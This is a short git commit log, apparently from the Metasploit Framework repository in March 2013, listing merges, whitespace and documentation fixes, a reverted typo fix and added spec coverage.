James Lee 24c0da0adb Merge branch 'rapid7' into doc/cleanup-peparsey 2013-03-05 21:00:26 -06:00
James Lee 27727df415 Merge branch 'R3dy-psexec-mixin2' into rapid7 2013-03-05 14:36:55 -06:00
James Lee 3acccd71f7 Whitespace and doc fix 2013-03-05 14:35:27 -06:00
James Lee a928e5f963 Whitespace 2013-03-05 14:34:56 -06:00
James Lee a64edb33c4 Make code sections look right in docs 2013-03-05 14:34:11 -06:00
David Maloney f5c23e4b02 fix typo snaffu 2013-03-05 12:35:21 -06:00
David Maloney 1407886e83 Revert "fix a major typo snaffu" 
This reverts commit c639de7ccc.
 2013-03-05 12:34:51 -06:00
David Maloney c639de7ccc fix a major typo snaffu 2013-03-05 12:33:37 -06:00
David Maloney 6eb334c925 a little more coverage 2013-03-05 00:01:09 -06:00
David Maloney d909c00036 better spec coverage 2013-03-04 23:43:18 -06:00
James Lee 9084e2a3bb Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-03-04 21:10:39 -06:00